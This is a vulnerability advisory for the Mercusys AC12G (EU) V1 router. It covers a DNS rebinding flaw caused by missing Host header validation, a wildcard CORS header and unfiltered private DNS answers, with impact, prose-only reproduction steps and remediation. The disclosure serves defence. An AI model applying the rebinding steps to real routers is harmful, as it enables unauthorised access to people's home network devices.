Mercusys AC12G (EU) V1 DNS Rebinding Vulnerability via Host Header Validation Issue

A vulnerability in the Mercusys AC12G (EU) V1 router, running firmware AC12G(EU)_V1_200909, allows for DNS rebinding attacks due to improper validation of the HTTP Host header. This flaw enables external attackers to rebind a domain to the router's internal IP address, exploiting the CORS wildcard vulnerability (Access-Control-Allow-Origin: *) to launch internet-originated attacks. The issue arises because the router's DNS resolver (Unbound 1.22.0) fails to filter private IP addresses in DNS responses, and the HTTP server accepts requests with any Host header value, including external domain names.

Impact

This vulnerability facilitates DNS rebinding attacks on the router's admin interface from the internet, leveraging the CORS wildcard to allow external scripts to access sensitive response data. When combined with other vulnerabilities, it could lead to a complete remote compromise of the router.

Reproduction

To reproduce this vulnerability, first, visit a domain controlled by the attacker that resolves to their public IP address. The attacker's DNS should be set to a very short TTL. Once the victim's device visits the domain, the attacker can update the DNS to resolve to the router's internal IP address. Malicious JavaScript loaded from the attacker's server can then make requests to the router, which will accept them due to the lack of Host header validation.

Remediation

Users are advised to configure the DNS resolver to block private IP addresses in responses, validate the Host header against the router's hostname and IP addresses, and remove the Access-Control-Allow-Origin: * header from all responses.